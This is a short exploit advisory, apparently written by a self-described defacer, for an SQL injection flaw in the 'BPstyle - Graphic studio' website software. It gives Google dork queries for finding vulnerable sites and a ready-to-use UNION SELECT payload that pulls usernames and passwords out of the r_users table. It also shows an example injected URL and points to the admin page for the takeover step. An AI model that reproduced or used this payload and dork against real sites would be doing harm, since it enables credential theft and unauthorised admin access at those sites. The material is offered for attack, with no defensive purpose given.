|
#-------------------In The Name Of God------------
# BPstyle - Graphic studio SQL Injection Vulnerabilities
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@gmail.com
#Webstie: www.r00t.gigfa.com
#
###################################
#Google D0rk:
# "Designed and Created by: BPstyle - Graphic studio"
# inurl:"/page/sindex.php?plug="
###################################
#Exploit:
#---------
#
-9999+UNION+SELECT+1,2,group_concat(username,0x3a,pw),4,5,6,7,8,9+from+r_users--
###################################
#Example:
#
#http://www.Site.com/page/sindex.php?plug=1&aid=-
9999+UNION+SELECT+1,2,group_concat(username,0x3a,pw),4,5,6,7,8,9+from+r_users--
###################################
#Admin Page:
#http://www.Site.com/admin
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************